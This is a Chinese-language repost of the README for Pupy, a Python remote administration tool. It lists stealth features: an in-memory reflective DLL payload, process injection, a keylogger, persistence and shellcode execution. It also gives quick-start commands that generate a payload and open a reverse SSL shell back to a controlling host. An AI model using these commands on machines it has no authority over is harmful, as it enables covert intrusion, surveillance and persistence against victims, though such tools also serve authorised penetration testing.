Python 远程管理工具:pupy

jopen 9年前

Pupy是一个远程管理工具,拥有内嵌的Python解释器,允许其模块从内存中加载Python包,透明地访问远程Python对象。Pupy使用反射的DLL和不会在磁盘上留下任何痕迹。

Features :

  • On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
  • Pupy can reflectively migrate into other processes
  • Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented).
  • modules are quite simple to write and pupy is easily extensible.
  • Pupy uses rpyc (https://github.com/tomerfiliba/rpyc) and a module can directly access python objects on the remote client
    • we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
    </li>
  • communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future
  • all the non interactive modules can be dispatched on multiple hosts in one command
  • Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)
  • modules can be executed as background jobs
  • commands and scripts running on remote hosts are interruptible
  • auto-completion and nice colored output :-)
  • commands aliases can be defined in the config
    • </ul>

    Implemented Modules :

    • migrate (windows only)
      • inter process architecture injection also works (x86->x64 and x64->x86)
      </li>
    • keylogger (windows only)
    • persistence (windows only)
    • screenshot (windows only)
    • command execution
    • download
    • upload
    • socks5 proxy
    • interactive shell (cmd.exe, /bin/sh, ...)
    • interactive python shell
    • shellcode exec (thanks to @byt3bl33d3r)
      • </ul>

      Quick start

      In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1
      The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)

      generate/run a payload

      for Windows 

      ./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe

      you can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.

      for Linux 

      pip install rpyc #(or manually copy it if you are not admin) python reverse_ssl.py 192.168.0.1:443

      for MAC OS X 

      easy_install rpyc #(or manually copy it if you are not admin) python reverse_ssl.py 192.168.0.1:443

      start the server

      1. eventually edit pupy.conf to change the bind address / port
      2. start the pupy server : 
      ./pupysh.py

      Some screenshots

      list connected clients

      screenshot1

      help

      screenshot3

      execute python code on all clients

      screenshot2

      execute a command on all clients, exception is retrieved in case the command does not exists

      screenshot4

      use a filter to send a module only on selected clients

      screenshot5

      migrate into another process

      screenshot6

      interactive shell

      screenshot7

      interactive python shell

      screenshot8

      项目主页:http://www.open-open.com/lib/view/home/1443084003685